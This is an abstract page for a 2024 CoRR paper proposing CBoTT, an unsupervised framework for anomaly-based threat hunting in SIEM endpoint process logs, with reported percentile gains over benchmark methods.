Unsupervised Threat Hunting using Continuous Bag-of-Terms-and-Time (CBoTT)
CoRR(2024)
摘要
Threat hunting is sifting through system logs to detect malicious activities
that might have bypassed existing security measures. It can be performed in
several ways, one of which is based on detecting anomalies. We propose an
unsupervised framework, called continuous bag-of-terms-and-time (CBoTT), and
publish its application programming interface (API) to help researchers and
cybersecurity analysts perform anomaly-based threat hunting among SIEM logs
geared toward process auditing on endpoint devices. Analyses show that our
framework consistently outperforms benchmark approaches. When logs are sorted
by likelihood of being an anomaly (from most likely to least), our approach
identifies anomalies at higher percentiles (between 1.82-6.46) while benchmark
approaches identify the same anomalies at lower percentiles (between
3.25-80.92). This framework can be used by other researchers to conduct
benchmark analyses and cybersecurity analysts to find anomalies in SIEM logs.
更多查看译文
AI 理解论文
溯源树
样例
生成溯源树,研究论文发展脉络
Chat Paper
正在生成论文摘要